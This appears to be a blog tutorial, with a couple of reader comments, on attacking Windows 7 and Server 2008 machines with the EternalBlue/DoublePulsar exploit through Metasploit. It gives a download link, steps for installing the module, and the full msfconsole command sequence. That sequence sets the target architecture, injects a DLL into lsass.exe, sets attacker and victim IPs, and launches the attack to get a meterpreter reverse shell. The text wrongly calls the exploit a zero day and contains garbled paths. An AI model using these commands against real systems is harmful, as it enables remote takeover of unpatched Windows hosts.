Through this article we are sharing recent zero day exploit which requires metasploit framework to shoot any other windows based system. This exploit is combination of two tools “Eternal Blue” which is use as backdooring in windows and “Doublepulsar” which is used for injecting dll file with the help of payload. So we will manually add this exploit in metasploit framework and step up for attacking window server 2008.
Attacker: kali Linux
Target: window 7 and window server 2008
Let’s Start!
Open the terminal in Kali Linux and type following command to download this exploit from git hub.
Git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Once the required exploit will get downloaded then open the folder and copy Eternal Blue- Doublepulsar .rb ruby file so that we can add this exploit inside metasploit.
Now past the copied ruby file inside given path Usr/share/metasploit Framework /module/exploits/windows/smbwhich will add this exploit inside metasploit framework.
Then load metasploit framework to start and type following for testing zero day exploit
Msfconsole
This module exploits vulnerability on SMBv1 and SMBv2 protocols through eternalblue. After that doublepulsar is used to inject remotely a malicious dll.
Use windows/smb/eternalblue_doublepulsar
Msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps
Msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps
Msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64
Msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe
Msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6
Msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104
Msf exploit (eternalblue_doublepulsar)>exploit
Hence from screenshot you can observer only we need to set target’s architecture and IP before launching exploit and then when all information is set then launch your attack which will give you meterpreter session successfully like I have owned.
source code : ETERNAL BLUE
video tutorial
VIDEO 1
VIDEO2
VIDEO3
VIDEO4
video 5
video 6
kelemahannya diambil dari smb
We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.
ReplyDelete